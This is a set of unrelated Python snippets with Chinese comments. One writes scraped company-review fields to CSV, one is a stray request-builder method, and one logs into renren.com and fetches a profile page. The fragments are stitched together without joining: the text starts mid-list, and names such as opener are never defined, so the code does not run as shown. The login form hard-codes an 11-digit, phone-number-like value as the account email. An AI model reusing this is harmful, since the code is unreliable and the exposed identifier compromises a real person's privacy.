"CurrentEmployee", "location", "header", "text", "stars" ]) print(len(date), len(job_title), len(currentFormer), len(location), len(header), len(text), len(stars)) for i, v in enumerate(text): writer.writerow([ re.search('cmp/(.*)/', url).group(1), date[i], job_title[i], currentFormer[i], location[i], header[i], text[i], stars[i] ])
def getRequest(self): return ur.Request(self.url_encoded, data=self.data, headers=self.header)
url = 'http://www.renren.com/PLogin.do' form_data = { 'email': '18518753265', 'password': '******', } #首先要使用urlencode转换为url格式的编码,然后再转成b'(bytes) form_data = parse.urlencode(form_data).encode('utf-8') print(form_data) #构造请求 headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0', } #构建一个请求对象 req = request.Request(url, data=form_data, method="POST", headers=headers) #发起请求 response = opener.open(req) print(response.status) # for cookie in cookieJar: # print(cookie.name,cookie.value) url = 'http://www.renren.com/965722397/profile' headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0', } #构建一个请求对象 req = request.Request(url, headers=headers)